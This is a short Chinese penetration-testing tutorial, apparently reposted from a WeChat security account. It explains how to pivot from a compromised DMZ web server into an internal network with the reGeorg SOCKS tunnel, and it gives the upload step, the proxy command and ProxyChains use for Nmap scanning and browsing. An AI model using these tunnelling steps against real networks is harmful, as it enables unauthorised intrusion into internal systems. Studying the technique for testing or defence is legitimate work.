说明:reGeorg是reDuh的升级版,一般在目标主机无法访问外网的情况下会使用它,可从“https://github.com/sensepost/reGeorg”下载。若目标提供Web服务,可通过上传reGeorg内置的目标能够解析的脚本来建立Socks正向代理,它使用Socks5协议建立隧道。
使用reGeorg搭建正向代理的实例,场景拓扑:
假设通过Web漏洞拿下了DMZ区的官网服务器,官网服务器只对外开放80端口,且官网服务器无法访问外网,若想以官网服务器为跳板攻击内网OA系统,则可以将对应语言脚本上传到DMZ区靶机,然后访问脚本显示“Georg says, 'All seems fine'”则表示上传成功。
在攻击机运行下述命令,启动reGeorg:
命令格式:python reGeorgSocksProxy.py -p [本地接收流量的端口] -u [流量转发脚本URL]
python reGeorgSocksProxy.py -p 1080 -u http://192.168.19.145/tunnel.aspx
代理服务器搭建成功后可以选择代理客户端搭配使用,以ProxyChains为例,配置添加代理后使用ProxyChains代理应用:
vim /etc/proxychains4.conf
使用ProxyChains代理Nmap对内网目标进行端口扫描:
proxychains4 nmap -Pn -sT -n 192.168.19.132 -p 21,22,23,24,80
攻击机无法直接访问内网OA网站,通过跳板机代理可以访问:
proxychains4 firefox
原文始发于微信公众号(ZackSecurity):【内网渗透】reGeorg流量隧道搭建
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论